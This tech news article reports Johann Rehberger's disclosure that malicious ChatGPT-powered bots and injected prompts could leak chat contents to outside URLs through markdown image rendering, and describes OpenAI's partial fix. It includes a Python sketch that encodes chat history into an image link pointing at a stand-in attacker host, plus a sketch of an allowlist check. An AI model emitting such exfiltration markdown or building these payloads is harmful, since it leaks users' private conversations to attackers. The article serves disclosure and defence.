A researcher discovered a serious flaw in ChatGPT that allowed details from a conversation to be leaked to an external URL.
When Johann Rehberger attempted to alert OpenAI to the flaw, he received no response, eventually leading him to disclose the details publicly.
Following the disclosure, OpenAI released safety checks for ChatGPT that partially, but not completely, mitigate the flaw.
A hasty patch
The flaw in question allows malicious chatbots powered by ChatGPT to exfiltrate sensitive data, such as the content of the chat, alongside metadata and technical data.
A secondary method involves the victim submitting a prompt supplied by the attacker, which uses markdown image rendering and prompt injection to exfiltrate the data.
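To illustrate how markdown image rendering can leak data, here is a minimal sketch of the general technique. The attacker domain, function name, and URL parameter are hypothetical, and this is not Rehberger's actual payload: the point is only that a rendered image tag triggers a GET request that carries the encoded chat contents to a server the attacker controls.

```python
from urllib.parse import quote

# Hypothetical attacker-controlled endpoint (illustrative only).
ATTACKER_URL = "https://attacker.example/collect"

def build_exfil_markdown(chat_history: str) -> str:
    """URL-encode chat contents into the query string of an image link.

    When a markdown client renders the resulting image tag, it issues a
    GET request to the attacker's server, leaking the data in the URL.
    """
    payload = quote(chat_history)
    return f"![loading]({ATTACKER_URL}?q={payload})"

# An injected prompt would instruct the model to emit markdown like this:
print(build_exfil_markdown("user: my password is hunter2"))
```

Because the request is made automatically by the client when it displays the image, the victim never has to click anything, which is what makes this class of injection so dangerous.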
Rehberger initially reported the flaw to OpenAI in April 2023, and continued supplying details of increasingly devious ways it could be exploited through November.
Rehberger stated that, "This GPT and underlying instructions were promptly reported to OpenAI on November, 13th 2023. However, the ticket was closed on November 15th as "Not Applicable". Two follow up inquiries remained unanswered. Hence it seems best to share this with the public to raise awareness."
Rather than continue pursuing an apparently unresponsive OpenAI, Rehberger decided to go public with his discovery, releasing a video demonstration showing how his entire conversation with a chatbot designed to play tic-tac-toe was exfiltrated to a third-party URL.
To mitigate this flaw, ChatGPT now performs checks to prevent the secondary method mentioned above from taking place. Rehberger responded to this fix, stating: “When the server returns an image tag with a hyperlink, there is now a ChatGPT client-side call to a validation API before deciding to display an image.”
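A client-side check of this kind might plausibly work as sketched below. This is an assumption-laden illustration, not OpenAI's actual implementation: the allowlisted domains and the function name are invented, and the real validation API's logic is not public.

```python
from urllib.parse import urlparse

# Hypothetical allowlist; the real validation API's rules are not public.
ALLOWED_DOMAINS = {"openai.com", "oaiusercontent.com"}

def should_render_image(url: str) -> bool:
    """Return True only if the image URL's host is on the allowlist.

    A client would call a check like this before fetching the image,
    blocking requests to arbitrary attacker-controlled domains.
    """
    host = urlparse(url).hostname or ""
    return any(host == d or host.endswith("." + d) for d in ALLOWED_DOMAINS)

print(should_render_image("https://files.oaiusercontent.com/img.png"))  # allowed
print(should_render_image("https://attacker.example/collect?q=data"))   # blocked
```

The hit-and-miss behaviour Rehberger observed suggests the real check is more complex than a simple allowlist, which is consistent with it only partially mitigating the flaw.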
Unfortunately, these new checks do not fully mitigate the flaw: Rehberger found that ChatGPT still sometimes renders images from arbitrary domains, though success is hit and miss. And while the checks have apparently been implemented in the desktop versions of ChatGPT, the flaw remains exploitable in the iOS mobile app.
Benedict Collins is a Staff Writer at TechRadar Pro covering privacy and security. Before settling into journalism he worked as a Livestream Production Manager, covering games in the National Ice Hockey League for 5 years and contributing heavily to the advancement of livestreaming within the league. Benedict is mainly focused on security issues such as phishing, malware, and cyber criminal activity, but he also likes to draw on his knowledge of geopolitics and international relations to understand the motives and consequences of state-sponsored cyber attacks.
He has an MA in Security, Intelligence and Diplomacy, alongside a BA in Politics with Journalism, both from the University of Buckingham. His master's dissertation, titled 'Arms sales as a foreign policy tool,' argues that the export of weapon systems has been an integral part of the diplomatic toolkit used by the US, Russia and China since 1945. Benedict has also written about NATO's role in the era of hybrid warfare, the influence of interest groups on US foreign policy, and how reputational insecurity can contribute to the misuse of intelligence.
Outside of work Ben follows many sports; most notably ice hockey and rugby. When not running or climbing, Ben can most often be found deep in the shrubbery of a pub garden.